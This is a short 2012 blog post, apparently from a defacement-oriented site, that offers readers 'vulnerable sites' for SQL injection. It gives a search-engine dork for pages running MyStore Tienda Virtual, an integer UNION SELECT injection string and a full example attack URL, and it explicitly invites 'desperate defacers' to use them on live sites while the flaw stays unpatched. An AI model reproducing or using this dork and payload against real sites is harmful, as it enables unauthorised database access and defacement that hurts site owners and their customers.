Searching...
January 4, 2012
Wednesday, January 04, 2012

[Reconnaissance] SQL Injection 3 January 2012

Feel free to find vulnerable site, to perform SQL Injection!

Do you like to perform SQL Injection? Are you a desperate defacer to find a vulnerability? Don't be sad, and don't worry. Because we will give a vulnerable site for you. Include dork, Injection type, Injection command, and Example.

We will update our reconnaissance every week to give another vulnerable sites for you. I think you must follow this site to get a notification when we post another vulnerable site. Enjoy.


1. MyStore Tienda Virtual 0day
Dork: inurl: "art_detalle.php?id="
Injection type: Integer
Injection Command: +UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13--
Example: http://blablabla.com/art_detalle.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables--

This exploit maybe working for a week, until MyStore Tienda Virtual fix their bug =)

2 comment:

Post a Comment

 
Back to top!